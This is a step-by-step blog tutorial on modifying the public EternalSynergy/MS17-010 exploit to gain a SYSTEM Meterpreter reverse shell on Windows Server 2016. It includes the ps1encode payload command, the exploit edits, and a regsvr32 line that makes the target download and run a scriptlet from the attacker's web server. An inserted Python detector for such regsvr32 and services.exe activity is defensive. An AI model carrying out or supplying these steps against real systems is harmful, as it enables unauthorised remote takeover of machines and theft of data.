How to get a Meterpreter reverse shell by attacking EternalBlue on Windows 2016
by backlion0x00
Preface
When Microsoft released the patch for the MS17-010 vulnerability, the affected versions ranged from Windows 7 to Windows Server 2016. However, the EternalBlue exploit released by the ShadowBrokers is very unstable against Windows Server 2012 and later, where 99% of the time the attack does not behave as intended. To understand the NSA exploits and make better use of them, many security researchers have studied them since their release. That is why, a few days ago, an exploit for EternalSynergy developed by Sleepya was published, with improvements that make it more stable when attacking Windows Server 2012 and 2016 systems. But the truth is that if you want to use this exploit, you need to understand how it works and modify some of its code to achieve the result you want on the target machine.
That is why, after analysing the exploit, I am writing another article on how to attack Windows 2016. Step by step, the author will explain the issues in the exploit, making Sleepya's release usable in practice, and how to modify its behaviour to obtain a Meterpreter reverse shell on the target machine.
0x01 Exploitation
Setting up the experimental environment:
To build the lab environment, we need to configure the following hosts:
Target host: Windows Server 2016 (a Windows Server 2016 64-bit machine will be used as the target)
After installing the operating system you do not have to make any changes to it. Knowing the target IP address is sufficient, and the host needs to be running at the time of the attack.
Attack host: GNU/Linux
Any Linux distribution can be used here; the author recommends Kali, as long as the following tools are installed:
- Python v2.7 - https://www.python.org/download/releases/2.7
- ps1encode - https://github.com/crowecybersecurity/ps1encode
- Metasploit Framework - https://github.com/rapid7/metasploit-framework
To summarise the configuration of the lab environment:
- Windows Server x64, IP 10.0.2.13: target host
- GNU/Linux Debian x64, IP 10.0.2.6: attack host
Getting the exploit:
The exploit has been published on Exploit-DB and can be downloaded from:
https://www.exploit-db.com/exploits/42315/
We can see that the exploit is written in Python, so we save it on the attack host with the .py extension (as exploit.py). Running the script then produces an error in the terminal:
The error shows that the mysmb module is missing.
Resolving dependencies:
Line 3 of the code imports the "mysmb" module, but this module is not in the public Python package index, so it cannot be installed with pip. The module was developed by Sleepya and has to be downloaded from his GitHub:
https://github.com/worawit/MS17-010/blob/master/mysmb.py
We save it as "mysmb.py" in the same folder as exploit.py. Keep in mind that running exploit.py also requires a file named "__init__.py" in that same folder.
With this, the exploit script finds the module it imports and no longer reports an error.
Checking that the exploit works:
Once the exploit succeeds, a file named "pwned.txt" is created on the C: drive of the target host. This lets us verify that the exploit works without making many modifications.
Although this simple test does not require modifying the exploit itself, we do have to set a few parameters, which we will see below.
Authentication:
The EternalSynergy exploit requires an authenticated session. If the Guest account is enabled the attack can authenticate with it; otherwise we must obtain the username and password of some other account on the target machine.
It is important to emphasise that the privileges of that account do not matter: even with the Guest account, the privileges obtained after the attack are SYSTEM.
To define this information, open exploit.py in a text editor and go to lines 26 and 27, where the username and password used for authentication are set.
Parameter settings:
This exploit needs two parameters: the target IP address and a pipe name. The SMB protocol defines three types of shares:
File: file (or disk) shares, representing a directory tree and the files it contains
Print: printer shares, giving access to print resources on the server
Pipe: inter-process communication using the FIFO model, known as a named pipe; the pipe persists while the system is running, even if the process that created it is no longer active.
Unlike EternalBlue, EternalRomance and EternalSynergy exploit a bug reached through named pipes, which is why we need to specify which pipe to use on the target host. Personally, the author uses "spoolss" or alternatively "browser". You can also use the Metasploit module auxiliary/scanner/smb/pipe_auditor to find the pipes accessible on the target host.
Executing without shellcode:
Now we run the exploit with the following command:
python exploit.py <target_ip> spoolss
As said earlier, if execution succeeds we will see that a new file named "pwned.txt" has been created on the C: drive of the target host.
More than half of the work is done. Next, we will look at the small modification needed to obtain a Meterpreter reverse shell.
Modifying the shellcode:
There are many ways to take advantage of the exploit's command execution to obtain a Meterpreter reverse shell or something else, instead of just writing a text file on the target host.
The first step is to generate the shellcode we will use. For this the author uses a personally preferred method that has many advantages when it comes to evading security defences.
In summary, the shellcode will be placed in an .sct file, which the exploit will make the target host download and execute, giving us the Meterpreter reverse shell session we want.
Creating the .sct file with ps1encode:
ps1encode is a useful tool that lets us generate and encode Metasploit payloads in various PowerShell-based formats.
We can download it from GitHub:
https://github.com/CroweCybersecurity/ps1encode
To generate the required payload, we run the tool with the following parameters:
ruby ps1encode.rb --payload windows/meterpreter/reverse_tcp --lhost=<attacker_ip> --lport=4444 -t sct
The .sct file we are generating must be hosted on the attack host or on a web server on any other host. That is why, when running the command above, the tool asks for the full URL at which the .sct file will be served. If we host it on the attack host, we only need: http://<attacker_ip>/
Note: you can move the generated .sct file to /var/www/html/ and start the web service so that it is reachable over the web.
Allowing shellcode.sct to be downloaded:
The final step generates a file named index.sct in the ps1encode folder. For the target host to be able to download it, we must move it to the web server folder and set the required permissions.
Editing exploit.py:
If we open exploit.py in a text editor and go to line 463 and the lines around it, we find the following:
Here we can see how, once the attack succeeds, the exploit creates the file pwned.txt on the target host. More interestingly, the following line contains a commented-out call to service_exec(). As an example, that call copies pwned.txt with the copy command. As long as the # at the start of the line stays in place the command is not executed; if we remove the # and run the exploit again, we will see two text files on the C: drive of the target host: pwned.txt and pwned_exec.txt.
Clearly, we can change that command to any other command we want to execute.
Executing the shellcode:
Now we know that, to change the exploit's end result, we have to edit the command passed to service_exec() so that the target host downloads and executes the Meterpreter reverse shell:
regsvr32 /s /n /u /i:http://<ATTACKER_WEBSERVER_IP>/shellcode.sct scrobj.dll
The modified exploit looks as follows:
Getting the Meterpreter session:
Finally, before running exploit.py, we must configure the Metasploit exploit/multi/handler module to receive the Meterpreter session.
We then run the modified exploit.py.
After a few seconds we get the Meterpreter reverse shell session on the target computer, with SYSTEM privileges.
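From the defender's side, the regsvr32 command used above and the fact that service_exec() runs it as a service leave a distinctive trace in process-creation telemetry. The following is an added detection example written for this edit, not part of the original article or of Sleepya's exploit; the Sysmon-style event records, their field names and the sample command lines (using the lab's 10.0.2.6 attack host) are constructed assumptions.

```python
import re

# Constructed process-creation records in the style of Sysmon event 1 / Windows 4688
# (not real telemetry). The first two mirror the commands the article has the
# exploit run through service_exec(); the third is a benign regsvr32 use.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32 /s /n /u /i:http://10.0.2.6/shellcode.sct scrobj.dll"},
    {"parent": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd /c copy c:\pwned.txt c:\pwned_exec.txt"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32.exe /s C:\Program Files\Vendor\plugin.dll"},
]

REMOTE_SCRIPTLET = re.compile(r"/i:\s*https?://", re.IGNORECASE)
SERVICE_SPAWNED = ("cmd.exe", "regsvr32.exe", "powershell.exe")


def regsvr32_scriptlet_indicators(cmdline):
    """Return the suspicious traits of a regsvr32 command line (empty if none)."""
    hits = []
    lower = cmdline.lower()
    if "regsvr32" not in lower:
        return hits
    if REMOTE_SCRIPTLET.search(cmdline):
        hits.append("remote /i: URL")
    if "scrobj.dll" in lower:
        hits.append("scrobj.dll")
    if " /n" in lower and " /u" in lower:  # skip DllRegisterServer, call DllInstall only
        hits.append("/n /u")
    return hits


def score_event(event):
    """Score one process-creation event; return (score, reasons)."""
    reasons = regsvr32_scriptlet_indicators(event["cmdline"])
    # service_exec() runs its command as a service, so the child hangs off services.exe.
    image = event["image"].lower().rsplit("\\", 1)[-1]
    if event["parent"].lower().endswith("services.exe") and image in SERVICE_SPAWNED:
        reasons = reasons + ["spawned by services.exe"]
    return len(reasons), reasons


def alerts(events, threshold=2):
    """Return (cmdline, reasons) for every event scoring at or above threshold."""
    scored = [(e["cmdline"], score_event(e)) for e in events]
    return [(c, r) for c, (s, r) in scored if s >= threshold]
```

A lone service-spawned cmd.exe scores below the threshold here, so in practice it would be correlated with the SMB named-pipe activity (spoolss or browser) that precedes it rather than alerted on by itself.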
0x02 Summary
Finally, we obtained a Meterpreter shell with administrator privileges on Windows Server 2016. A few weeks ago, the author published the exploit article in the Exploit-DB community, but it only covered exploitation of Windows 7 and Windows Server R2. This time the exploitation of Windows 2016 has been published.